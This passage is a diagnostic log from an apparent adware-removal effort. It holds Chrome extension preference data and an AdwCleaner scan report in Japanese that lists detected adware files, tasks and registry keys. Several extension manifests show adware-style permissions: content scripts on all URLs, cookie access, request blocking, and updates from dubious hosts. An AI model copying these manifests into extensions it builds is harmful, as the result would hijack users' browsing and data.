"api": [ "bookmarks", "bookmarkManagerPrivate", "metricsPrivate", "systemPrivate", "tabs" ],
"explicit_host": [ "chrome://favicon/*", "chrome://resources/*" ],
"manifest_permissions": [ ]
},
"commands": {

},
"content_settings": [ ],
"creation_flags": 1,
"ephemeral_app": false,
"events": [ ],
"from_bookmark": false,
"from_webstore": false,
"incognito_content_settings": [ ],
"incognito_preferences": {

},
"initial_keybindings_set": true,
"install_time": "13057562412300622",
"location": 5,
"manifest": {
"chrome_url_overrides": {
"bookmarks": "main.html"
},
"content_security_policy": "object-src 'none'; script-src chrome://resources 'self'",
"description": "Bookmark Manager",
"icons": {

},
"incognito": "split",
"key": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDQcByy+eN9jzazWF/DPn7NW47sW7lgmpk6eKc0BQM18q8hvEM3zNm2n7HkJv/R6fU+X5mtqkDuKvq5skF6qqUF4oEyaleWDFhd1xFwV7JV+/DU7bZ00w2+6gzqsabkerFpoP33ZRIw7OviJenP0c0uWqDWF8EGSyMhB3txqhOtiQIDAQAB",
"manifest_version": 2,
"name": "Bookmark Manager",
"permissions": [ "bookmarks", "bookmarkManagerPrivate", "metricsPrivate", "systemPrivate", "tabs", "chrome://favicon/", "chrome://resources/" ],
"version": "0.1"
},
"path": "C:\\Program Files (x86)\\Google\\Chrome\\Application\\37.0.2062.124\\resources\\bookmark_manager",
"preferences": {

},
"regular_only_preferences": {

},
"was_installed_by_default": false,
"was_installed_by_oem": false
},
"ennkphjdgehloodpbhlhldgbnhmacadg": {
"active_permissions": {
"api": [ ],
"explicit_host": [ "chrome://settings-frame/*" ],
"manifest_permissions": [ ]
},
"commands": {

},
"content_settings": [ ],
"creation_flags": 1,
"ephemeral_app": false,
"events": [ "app.runtime.onLaunched" ],
"from_bookmark": false,
"from_webstore": false,
"incognito_content_settings": [ ],
"incognito_preferences": {

},
"initial_keybindings_set": true,
"install_time": "13057562412300622",
"location": 5,
"manifest": {
"app": {
"background": {
"scripts": [ "settings_app.js" ]
}
},
"description": "Settings",
"display_in_launcher": false,
"icons": {
"128": "settings_app_icon_128.png",
"16": "settings_app_icon_16.png",
"32": "settings_app_icon_32.png",
"48": "settings_app_icon_48.png"
},
"key": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDoVDPGX6fvKPVVgc+gnkYlGqHuuapgFDyKhsy4z7UzRLO/95zXPv8h8e5EacqbAQJLUbP6DERH5jowyNEYVxq9GJyntJMwP1ejvoz/52hnY3CCGGCmttmKzzpp5zwLuq3iZf8bslwywfflNUYtaCFSDa0TtrBZz0aOPrAAd/AhNwIDAQAB",
"manifest_version": 2,
"name": "Settings",
"permissions": [ "chrome://settings-frame/" ],
"version": "0.2"
},
"path": "C:\\Program Files (x86)\\Google\\Chrome\\Application\\37.0.2062.124\\resources\\settings_app",
"preferences": {

},
"regular_only_preferences": {

},
"running": false,
"was_installed_by_default": false,
"was_installed_by_oem": false
},
"fcfenmboojpjinhpgggodefccipikbpd": {
"ack_prompt_count": 1,
"active_permissions": {
"api": [ "cookies", "homepage", "management", "searchProvider", "startupPages" ],
"explicit_host": [ "hxxp://*.bing.com/*", "hxxp://g.ceipmsn.com/*" ],
"manifest_permissions": [ ]
},
"commands": {

},
"content_settings": [ ],
"creation_flags": 9,
"disable_reasons": 8192,
"events": [ ],
"from_bookmark": false,
"from_webstore": true,
"incognito_content_settings": [ ],
"incognito_preferences": {

},
"initial_keybindings_set": true,
"install_parameter": "SKY2",
"install_time": "13071589647338339",
"lastpingday": "13071567600719544",
"location": 6,
"manifest": {
"background": {
"persistent": false,
"scripts": [ "background.js" ]
},
"chrome_settings_overrides": {
"homepage": "hxxp://www.msn.com/?pc=__PARAM__&ocid=__PARAM__DHP&osmkt=ja-jp",
"search_provider": {
"encoding": "UTF-8",
"favicon_url": "hxxp://www.bing.com/favicon.ico",
"is_default": true,
"keyword": "bing.com",
"name": "Bing",
"search_url": "hxxp://www.bing.com/search?FORM=__PARAM__DF&PC=__PARAM__&q={searchTerms}"
},
"startup_pages": [ "hxxp://www.msn.com/?pc=__PARAM__&ocid=__PARAM__DHP&osmkt=ja-jp" ]
},
"current_locale": "ja",
"default_locale": "en",
"description": "MSN Homepage & Bing Search Engine",
"icons": {
"128": "Logo_128.ico",
"16": "Logo.png",
"48": "Logo_48.ico"
},
"key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0JA3sXSSGLZfdufL1gcnN5sgZ7Upqkq0FF8aaRTf8v/banM0MIX3o6XqEV+ireOgQZIz1GcNKMEJ1BpeaheabEGRn3ZqQrO+gwpbeJDhuNcT8MD3npRoColMqG6rPG/b+GxM60gS0bBrELyNB6EeNj1j5hVvZA/VG92sW4Ld/Yqea6iKrs/Vfh99utT6V7CmTPMXLAvY40yufxWHEqpgsqU2gNn1FY94BB0UbWE40t5DHmC6y67F26uBRodQu//TZTd2BxcuGEUohU8jDTAs+dl8wCHGP19xBzWkEnI+RRTtUyZ1IeRY3x7W+Xbe60wz/UeoYQMmCdzdq1WDo8kgtwIDAQAB",
"manifest_version": 2,
"name": "MSN Homepage & Bing Search Engine",
"permissions": [ "hxxp://g.ceipmsn.com/*", "hxxp://*.bing.com/*", "cookies", "management" ],
"short_name": "MSN Homepage & Bing Search Engine",
"update_url": "hxxps://clients2.google.com/service/update2/crx",
"version": "0.0.0.6"
},
"path": "fcfenmboojpjinhpgggodefccipikbpd\\0.0.0.6_0",
"preferences": {

},
"regular_only_preferences": {

},
"state": 2,
"was_installed_by_default": false,
"was_installed_by_oem": false
},
"flnadehcbdhdllijcpefnpbbipaipbee": {
"ack_external": true,
"active_permissions": {
"api": [ "contextMenus", "cookies", "management", "notifications", "storage", "tabs" ],
"explicit_host": [ "hxxp://*/*", "hxxps://*/*" ],
"scriptable_host": [ "hxxp://*/*", "hxxps://*/*" ]
},
"from_bookmark": false,
"from_webstore": false,
"granted_permissions": {
"api": [ "contextMenus", "cookies", "management", "notifications", "storage", "tabs" ],
"explicit_host": [ "hxxp://*/*", "hxxps://*/*" ],
"scriptable_host": [ "hxxp://*/*", "hxxps://*/*" ]
},
"initial_keybindings_set": true,
"install_time": "13060590281352460",
"location": 1,
"manifest": {
"background": {
"page": "background.html"
},
"content_scripts": [ {
"all_frames": true,
"js": [ "content.js" ],
"matches": [ "hxxp://*/*", "hxxps://*/*" ],
"run_at": "document_end"
} ],
"description": "",
"key": "null",
"manifest_version": 2,
"name": "FlexibleShopper",
"permissions": [ "hxxp://*/*", "hxxps://*/*", "tabs", "cookies", "management", "notifications", "contextMenus", "management", "storage" ],
"version": "4.75"
},
"path": "flnadehcbdhdllijcpefnpbbipaipbee\\4.75",
"state": 1,
"was_installed_by_default": false
},
"gfdkimpbcpahaombhbimeihdjnejgicl": {
"active_permissions": {
"api": [ "feedbackPrivate" ],
"explicit_host": [ "chrome://resources/*" ],
"manifest_permissions": [ ]
},
"commands": {

},
"content_settings": [ ],
"creation_flags": 1,
"ephemeral_app": false,
"events": [ "feedbackPrivate.onFeedbackRequested", "runtime.onMessageExternal" ],
"from_bookmark": false,
"from_webstore": false,
"geometry_cache": {
"default_window": {
"h": 603,
"screen_bounds_h": 728,
"screen_bounds_w": 1366,
"screen_bounds_x": 0,
"screen_bounds_y": 0,
"state": 1,
"ts": "13066918854857194",
"w": 500,
"x": 433,
"y": 71
}
},
"incognito_content_settings": [ ],
"incognito_preferences": {

},
"initial_keybindings_set": true,
"install_time": "13057562412300622",
"is_active": false,
"location": 5,
"manifest": {
"app": {
"background": {
"scripts": [ "js/event_handler.js" ]
},
"content_security_policy": "default-src 'none'; script-src 'self' chrome://resources; style-src 'unsafe-inline' *; img-src *; media-src 'self'"
},
"description": "User feedback extension",
"display_in_launcher": false,
"display_in_new_tab_page": false,
"icons": {
"32": "images/icon32.png",
"64": "images/icon64.png"
},
"incognito": "split",
"key": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDMZElzFX2J1g1nRQ/8S3rg/1CjFyDltWOxQg+9M8aVgNVxbutEWFQz+oQzIP9BB67mJifULgiv12ToFKsae4NpEUR8sPZjiKDIHumc6pUdixOm8SJ5Rs16SMR6+VYxFUjlVW+5CA3IILptmNBxgpfyqoK0qRpBDIhGk1KDEZ4zqQIDAQAB",
"manifest_version": 2,
"name": "Feedback",
"permissions": [ "feedbackPrivate", "chrome://resources/" ],
"version": "1.0"
},
"path": "C:\\Program Files (x86)\\Google\\Chrome\\Application\\37.0.2062.124\\resources\\feedback",
"preferences": {

},
"regular_only_preferences": {

},
"running": false,
"was_installed_by_default": false,
"was_installed_by_oem": false
},
"gmlllbghnfkpflemihljekbapjopfjik": {
"ack_external": true,
"active_permissions": {
"api": [ "activeTab", "bookmarks", "bookmarkManagerPrivate", "fileSystem", "fileSystem.write", "identity", "identity.email", "management", "metricsPrivate", "notifications", "preferencesPrivate", "storage", "tabs", "webConnectable" ],
"explicit_host": [ "*://*.google.com/*", "chrome://favicon/*" ],
"manifest_permissions": [ {
"chrome_ui_overrides": true
} ]
},
"commands": {
"_execute_page_action": {
"suggested_key": "Ctrl+D",
"was_assigned": true
}
},
"content_settings": [ ],
"creation_flags": 137,
"events": [ ],
"from_bookmark": false,
"from_webstore": true,
"granted_permissions": {
"api": [ "activeTab", "bookmarks", "bookmarkManagerPrivate", "fileSystem", "fileSystem.write", "identity", "identity.email", "management", "metricsPrivate", "notifications", "preferencesPrivate", "storage", "tabs", "webConnectable" ],
"explicit_host": [ "*://*.google.com/*", "chrome://favicon/*" ],
"manifest_permissions": [ {
"chrome_ui_overrides": true
} ]
},
"incognito_content_settings": [ ],
"incognito_preferences": {

},
"initial_keybindings_set": true,
"install_time": "13074225703693959",
"lastpingday": "13074591599132997",
"location": 10,
"manifest": {
"background": {
"persistent": true,
"scripts": [ "bootstrap.js", "background_compiled.js" ]
},
"chrome_ui_overrides": {
"bookmarks_ui": {
"remove_bookmark_shortcut": true,
"remove_button": true
}
},
"chrome_url_overrides": {
"bookmarks": "bookmarks.html"
},
"commands": {
"_execute_page_action": {
"description": "Stars popup",
"suggested_key": {
"default": "Ctrl+D"
}
}
},
"content_security_policy": "script-src 'self' hxxps://*.google.com hxxps://*.gstatic.com; object-src 'self'",
"current_locale": "ja",
"default_locale": "en",
"description": "Bookmark Manager",
"externally_connectable": {
"matches": [ "*://*.google.com/*" ]
},
"icons": {
"16": "icons/bookmarks16.png",
"32": "icons/bookmarks32.png"
},
"key": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDO1rEc7Du17LBzIOf1nXMC4JM4suAzgaswHRjJhaE4/fNIXxrTjqaDH5tpU7huX8RdVyuu3zggdP36mpqhLYNzCf9fgnvhZEGpsXYqedWXapQ4nrVca4Xg5SB8/K7oRS+dnMwwxYjED434qTyfiSiJoXVo7MXa+qBckMQ6Wf0t0QIDAQAB",
"manifest_version": 2,
"minimum_chrome_version": "42",
"name": "Bookmark Manager",
"oauth2": {
"client_id": "610799782257-avhfi6rijk0n02t94linmllq54ool5kf.apps.googleusercontent.com",
"scopes": [ "hxxps://www.googleapis.com/auth/chromesync" ]
},
"page_action": {
"default_icon": {
"19": "icons/collected19.png"
},
"default_title": "Star Page"
},
"permissions": [ "activeTab", "bookmarks", "bookmarkManagerPrivate", "chrome://favicon/", "identity", "identity.email", "management", "metricsPrivate", "notifications", "preferencesPrivate", "storage", "tabs", "*://*.google.com/*", {
"fileSystem": [ "write" ]
} ],
"update_url": "hxxps://clients2.google.com/service/update2/crx",
"version": "2.2015.421.10417"
},
"path": "gmlllbghnfkpflemihljekbapjopfjik\\2.2015.421.10417_0",
"preferences": {

},
"regular_only_preferences": {

},
"state": 1,
"was_installed_by_default": true,
"was_installed_by_oem": false
},
"hdmclgnbhdiklglmmdcaelggigiiigpm": {
"active_permissions": {
"api": [ "contextMenus", "cookies", "notifications", "storage", "tabs", "unlimitedStorage", "webNavigation", "webRequest", "webRequestBlocking" ],
"explicit_host": [ "hxxp://*/*", "hxxps://*/*" ],
"manifest_permissions": [ ],
"scriptable_host": [ "hxxp://*/*", "hxxps://*/*" ]
},
"creation_flags": 9,
"events": [ ],
"extension_can_script_all_urls": true,
"from_webstore": true,
"granted_permissions": {
"api": [ "tabs", "cookies", "notifications", "contextMenus", "webNavigation", "webRequest", "webRequestBlocking", "unlimitedStorage", "storage", "webRequestInternal" ],
"explicit_host": [ "hxxp://*/*", "hxxps://*/*" ],
"scriptable_host": [ "hxxp://*/*", "hxxps://*/*" ]
},
"install_time": "13057562412097622",
"location": 1,
"manifest": {
"background": {
"page": "background.html"
},
"content_scripts": [ {
"all_frames": true,
"js": [ "js/platformVersion.js", "js/lib/consts.js", "js/lib/logging.js", "js/lib/reports.js", "js/lib/xhr.js", "js/api/cookie.js", "js/api/message.js", "js/api/pageAction.js", "js/lib/installer.js", "js/lib/app_api.js" ],
"matches": [ "hxxp://*/*", "hxxps://*/*" ],
"run_at": "document_start"
} ],
"content_security_policy": "script-src 'self' 'unsafe-eval'; object-src 'self'",
"description": "Enhancing browsing experience",
"icons": {
"128": "icons/icon128.png",
"16": "icons/icon16.png",
"48": "icons/icon48.png"
},
"key": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDPW985huXpqn4hsKqHBSM+LgiUCvdORJ0MivlmJKA128EwMpo1TAGQhFN6/57mk82diAjgCwlWW5K2HLYJmnpCgXM0zU/p6yh1OSTuXVR6QWy+O5FU3Wy2Wg+I5fth/8BXKJXNJCoOs8YuuOd6ERf6C0ASt0dkKFAE5ny61TBpgwIDAQAB",
"manifest_version": 2,
"name": "Browsers Apps",
"permissions": [ "hxxp://*/*", "hxxps://*/*", "tabs", "cookies", "notifications", "contextMenus", "webNavigation", "webRequest", "webRequestBlocking", "unlimitedStorage", "storage" ],
"update_url": "hxxps://w9u6a2p6.ssl.hwcdn.net/plugin/chrome/update/61787.xml",
"version": "12260.8815.4569",
"web_accessible_resources": [ "Settings.json" ]
},
"path": "hdmclgnbhdiklglmmdcaelggigiiigpm\\12260.8815.4569_0",
"state": 1
},
"ifohbjbgfchkkfhphahclmkpgejiplfo": {
"active_permissions": {
"api": [ "contextMenus", "cookies", "notifications", "storage", "tabs", "unlimitedStorage", "webNavigation", "webRequest", "webRequestBlocking" ],
"explicit_host": [ "hxxp://*/*", "hxxps://*/*" ],
"manifest_permissions": [ ],
"scriptable_host": [ "hxxp://*/*", "hxxps://*/*" ]
},
"creation_flags": 9,
"events": [ ],
"extension_can_script_all_urls": true,
"from_webstore": true,
"granted_permissions": {
"api": [ "tabs", "cookies", "notifications", "contextMenus", "webNavigation", "webRequest", "webRequestBlocking", "unlimitedStorage", "storage", "webRequestInternal" ],
"explicit_host": [ "hxxp://*/*", "hxxps://*/*" ],
"scriptable_host": [ "hxxp://*/*", "hxxps://*/*" ]
},
"install_time": "13057562412097622",
"location": 1,
"manifest": {
"background": {
"page": "background.html"
},
"content_scripts": [ {
"all_frames": true,
"js": [ "js/platformVersion.js", "js/lib/consts.js", "js/lib/logging.js", "js/lib/reports.js", "js/lib/xhr.js", "js/api/cookie.js", "js/api/message.js", "js/api/pageAction.js", "js/lib/installer.js", "js/lib/app_api.js" ],
"matches": [ "hxxp://*/*", "hxxps://*/*" ],
"run_at": "document_start"
} ],
"content_security_policy": "script-src 'self' 'unsafe-eval'; object-src 'self'",
"description": "Turn YouTube videos to High Definition by default",
"icons": {
"128": "icons/icon128.png",
"16": "icons/icon16.png",
"48": "icons/icon48.png"
},
"key": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtOn5aaeMRbHbPOfedsSyLIMiboZGF/2v3fVJbng+tRGbtumx1bM/n4Y5aG9JgSud6RDts5vvt94I3IZvagY8ib8vJKG1yv1RqGvD+NtNdt8VhzTzqSObJlav8u4P2UU7Kdz4PTEX1iboCrbwchapPlMBBPQ5kzzr9SslQE9egnQIDAQAB",
"manifest_version": 2,
"name": "HQ-V1.4",
"permissions": [ "hxxp://*/*", "hxxps://*/*", "tabs", "cookies", "notifications", "contextMenus", "webNavigation", "webRequest", "webRequestBlocking", "unlimitedStorage", "storage" ],
"update_url": "hxxps://epicunitscan.info/00service/update2/crx",
"version": "14112.9866.7746",
"web_accessible_resources": [ "crossriderManifest.json" ]
},
"path": "ifohbjbgfchkkfhphahclmkpgejiplfo\\14112.9866.7746_0

-\\ Opera v0.0.0.0


*************************

AdwCleaner[R0].txt - [40235 bytes] - [29/04/2015 22:18:27]

########## EOF - C:\AdwCleaner\AdwCleaner[R0].txt - [40295 bytes] ##########


# AdwCleaner v4.202 - ログファイルの作成日 29/04/2015 作成時間 22:18:27
# 更新日 23/04/2015 作成元 Xplode
# データベース : 2015-04-27.1 [サーバー]
# オペレーティングシステム : Windows 7 Home Premium Service Pack 1 (x64)
# ユーザー名 : Owner - OWNER-PC
# 実行場所 : C:\Users\Owner\Downloads\adwcleaner_4.202.exe
# オプション : スキャン

***** [ サービス ] *****

サービス 検出済み項目 : Scores
サービス 検出済み項目 : SPPD
サービス 検出済み項目 : {6fcd6092-9615-4f7f-8898-8df53980e5d2}w64
サービス 検出済み項目 : F06DEFF2-5B9C-490D-910F-35D3A9119622

***** [ ファイル / フォルダ ] *****

ファイル 検出済み項目 : C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\databases\chrome-extension_ifohbjbgfchkkfhphahclmkpgejiplfo_0
ファイル 検出済み項目 : C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\databases\chrome-extension_ifohbjbgfchkkfhphahclmkpgejiplfo_0
ファイル 検出済み項目 : C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ifohbjbgfchkkfhphahclmkpgejiplfo
ファイル 検出済み項目 : C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ifohbjbgfchkkfhphahclmkpgejiplfo
ファイル 検出済み項目 : C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_ifohbjbgfchkkfhphahclmkpgejiplfo_0.localstorage
ファイル 検出済み項目 : C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_ifohbjbgfchkkfhphahclmkpgejiplfo_0.localstorage
ファイル 検出済み項目 : C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_ifohbjbgfchkkfhphahclmkpgejiplfo_0.localstorage-journal
ファイル 検出済み項目 : C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_ifohbjbgfchkkfhphahclmkpgejiplfo_0.localstorage-journal
ファイル 検出済み項目 : C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_pfhnkainfgebjkhaoadlkjgjhhgpbohg_0.localstorage
ファイル 検出済み項目 : C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\searchplugins\default-search.xml
ファイル 検出済み項目 : C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\searchplugins\dsrlte.xml
ファイル 検出済み項目 : C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\searchplugins\trovi-search.xml
ファイル 検出済み項目 : C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\user.js
ファイル 検出済み項目 : C:\Users\Owner\AppData\Roaming\Opera Software\Opera Stable\databases\chrome-extension_ffhfoagmjcnkolneahbpagjcjjaeofbg_0
ファイル 検出済み項目 : C:\Users\Owner\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\ffhfoagmjcnkolneahbpagjcjjaeofbg
ファイル 検出済み項目 : C:\Users\Owner\AppData\Roaming\Opera Software\Opera Stable\Local Storage\chrome-extension_ffhfoagmjcnkolneahbpagjcjjaeofbg_0.localstorage
ファイル 検出済み項目 : C:\windows\AppPatch\Custom\{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb
ファイル 検出済み項目 : C:\windows\AppPatch\Custom\Custom64\{cf2797aa-b7ec-e311-8ed9-005056c00008}.sdb
ファイル 検出済み項目 : C:\windows\Reimage.ini
ファイル 検出済み項目 : C:\windows\System32\drivers\{6fcd6092-9615-4f7f-8898-8df53980e5d2}w64.sys
ファイル 検出済み項目 : C:\windows\System32\roboot64.exe
フォルダ 検出済み項目 : C:\Program Files (x86)\baidu
フォルダ 検出済み項目 : C:\Program Files (x86)\FoxTab
フォルダ 検出済み項目 : C:\Program Files (x86)\globalUpdate
フォルダ 検出済み項目 : C:\Program Files (x86)\Hold Page
フォルダ 検出済み項目 : C:\Program Files (x86)\MyPC Backup
フォルダ 検出済み項目 : C:\Program Files (x86)\RegClean Pro
フォルダ 検出済み項目 : C:\Program Files (x86)\SearchProtect
フォルダ 検出済み項目 : C:\ProgramData\374311380
フォルダ 検出済み項目 : C:\ProgramData\4e937783cf542897
フォルダ 検出済み項目 : C:\ProgramData\baidu
フォルダ 検出済み項目 : C:\ProgramData\SaverAddon
フォルダ 検出済み項目 : C:\Users\Owner\AppData\Local\globalUpdate
フォルダ 検出済み項目 : C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\flnadehcbdhdllijcpefnpbbipaipbee
フォルダ 検出済み項目 : C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ifohbjbgfchkkfhphahclmkpgejiplfo
フォルダ 検出済み項目 : C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ifohbjbgfchkkfhphahclmkpgejiplfo
フォルダ 検出済み項目 : C:\Users\Owner\AppData\Local\pay-by-ads
フォルダ 検出済み項目 : C:\Users\Owner\AppData\Local\SearchProtect
フォルダ 検出済み項目 : C:\Users\Owner\AppData\Local\Systweak
フォルダ 検出済み項目 : C:\Users\Owner\AppData\LocalLow\baidu
フォルダ 検出済み項目 : C:\Users\Owner\AppData\Roaming\baidu
フォルダ 検出済み項目 : C:\Users\Owner\AppData\Roaming\cloudbkp
フォルダ 検出済み項目 : C:\Users\Owner\AppData\Roaming\FirefoxToolbar
フォルダ 検出済み項目 : C:\Users\Owner\AppData\Roaming\FoxTab
フォルダ 検出済み項目 : C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VOPackage
フォルダ 検出済み項目 : C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\Extensions\Na@4skpeF6a.org
フォルダ 検出済み項目 : C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\Extensions\w1@bVfSQOc5.com
フォルダ 検出済み項目 : C:\Users\Owner\AppData\Roaming\Opera Software\Opera Stable\Extensions\ffhfoagmjcnkolneahbpagjcjjaeofbg
フォルダ 検出済み項目 : C:\Users\Owner\AppData\Roaming\Systweak
フォルダ 検出済み項目 : C:\Users\Owner\AppData\Roaming\VOPackage
フォルダ 検出済み項目 : C:\Users\Owner\Documents\baidu

***** [ スケジュールタスク ] *****

タスク 検出済み項目 : ASP
タスク 検出済み項目 : Yahoo! Search
タスク 検出済み項目 : 14ee8834-7bd6-4eba-bb20-1e498ae70e2e-11
タスク 検出済み項目 : 14ee8834-7bd6-4eba-bb20-1e498ae70e2e-3
タスク 検出済み項目 : 14ee8834-7bd6-4eba-bb20-1e498ae70e2e-6
タスク 検出済み項目 : 14ee8834-7bd6-4eba-bb20-1e498ae70e2e-7
タスク 検出済み項目 : 89e02368-f8c7-495c-aabd-c27cc648d509-1
タスク 検出済み項目 : 89e02368-f8c7-495c-aabd-c27cc648d509-11
タスク 検出済み項目 : 89e02368-f8c7-495c-aabd-c27cc648d509-3
タスク 検出済み項目 : 89e02368-f8c7-495c-aabd-c27cc648d509-4
タスク 検出済み項目 : 89e02368-f8c7-495c-aabd-c27cc648d509-5
タスク 検出済み項目 : 89e02368-f8c7-495c-aabd-c27cc648d509-5_user
タスク 検出済み項目 : 89e02368-f8c7-495c-aabd-c27cc648d509-6
タスク 検出済み項目 : 89e02368-f8c7-495c-aabd-c27cc648d509-7
タスク 検出済み項目 : d3490901-808d-490f-befe-ede48292dfd6

***** [ ショートカット ] *****


***** [ レジストリ ] *****

キー 検出済み項目 : HKCU\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
キー 検出済み項目 : HKCU\Software\AppDataLow\Software\Crossrider
キー 検出済み項目 : HKCU\Software\Baidu
キー 検出済み項目 : HKCU\Software\Classes\keepmysearch
キー 検出済み項目 : HKCU\Software\GlobalUpdate
キー 検出済み項目 : HKCU\Software\Google\Chrome\Extensions\fcfenmboojpjinhpgggodefccipikbpd
キー 検出済み項目 : HKCU\Software\InstallCore
キー 検出済み項目 : HKCU\Software\InstalledBrowserExtensions
キー 検出済み項目 : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2492}
キー 検出済み項目 : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{4D9101D6-5BA0-4048-BDDE-7E2DF54C8C47}
キー 検出済み項目 : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Yahoo! Search
キー 検出済み項目 : HKCU\Software\Optimizer Pro
キー 検出済み項目 : HKCU\Software\SearchProtectINT
キー 検出済み項目 : HKCU\Software\Softonic
キー 検出済み項目 : HKCU\Software\systweak
キー 検出済み項目 : HKCU\Software\Tune
キー 検出済み項目 : [x64] HKCU\Software\Baidu
キー 検出済み項目 : [x64] HKCU\Software\GlobalUpdate
キー 検出済み項目 : [x64] HKCU\Software\InstallCore
キー 検出済み項目 : [x64] HKCU\Software\InstalledBrowserExtensions
キー 検出済み項目 : [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2492}
キー 検出済み項目 : [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2492}
キー 検出済み項目 : [x64] HKCU\Software\Optimizer Pro
キー 検出済み項目 : [x64] HKCU\Software\SearchProtectINT
キー 検出済み項目 : [x64] HKCU\Software\Softonic
キー 検出済み項目 : [x64] HKCU\Software\systweak
キー 検出済み項目 : [x64] HKCU\Software\Tune
キー 検出済み項目 : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
キー 検出済み項目 : HKLM\SOFTWARE\{6791A2F3-FC80-475C-A002-C014AF797E9C}
キー 検出済み項目 : HKLM\SOFTWARE\0bcf5df0-4fd6-4897-a645-0ee111b55f16
キー 検出済み項目 : HKLM\SOFTWARE\54eb8b87-af54-44b4-ae28-6845849b7bf2
キー 検出済み項目 : HKLM\SOFTWARE\Baidu
キー 検出済み項目 : HKLM\SOFTWARE\Classes\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}
キー 検出済み項目 : HKLM\SOFTWARE\Classes\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}
キー 検出済み項目 : HKLM\SOFTWARE\Classes\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}
キー 検出済み項目 : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
キー 検出済み項目 : HKLM\SOFTWARE\Classes\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}
キー 検出済み項目 : HKLM\SOFTWARE\Classes\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}
キー 検出済み項目 : HKLM\SOFTWARE\Classes\CLSID\{459DD0F7-0D55-D3DC-67BC-E6BE37E9D762}
キー 検出済み項目 : HKLM\SOFTWARE\Classes\CLSID\{4AA46D49-459F-4358-B4D1-169048547C23}
キー 検出済み項目 : HKLM\SOFTWARE\Classes\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}
キー 検出済み項目 : HKLM\SOFTWARE\Classes\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}
キー 検出済み項目 : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CoreClass
キー 検出済み項目 : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CoreClass.1
キー 検出済み項目 : HKLM\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassSvc
キー 検出済み項目 : HKLM\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassSvc.1.0
キー 検出済み項目 : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3COMClassService
キー 検出済み項目 : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3COMClassService.1.0
キー 検出済み項目 : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3WebSvc
キー 検出済み項目 : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3WebSvc.1.0
キー 検出済み項目 : HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
キー 検出済み項目 : HKLM\SOFTWARE\Classes\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}
キー 検出済み項目 : HKLM\SOFTWARE\Classes\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}
キー 検出済み項目 : HKLM\SOFTWARE\Conduit
キー 検出済み項目 : HKLM\SOFTWARE\GlobalUpdate
キー 検出済み項目 : HKLM\SOFTWARE\Hold Page
キー 検出済み項目 : HKLM\SOFTWARE\InstalledBrowserExtensions
キー 検出済み項目 : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}
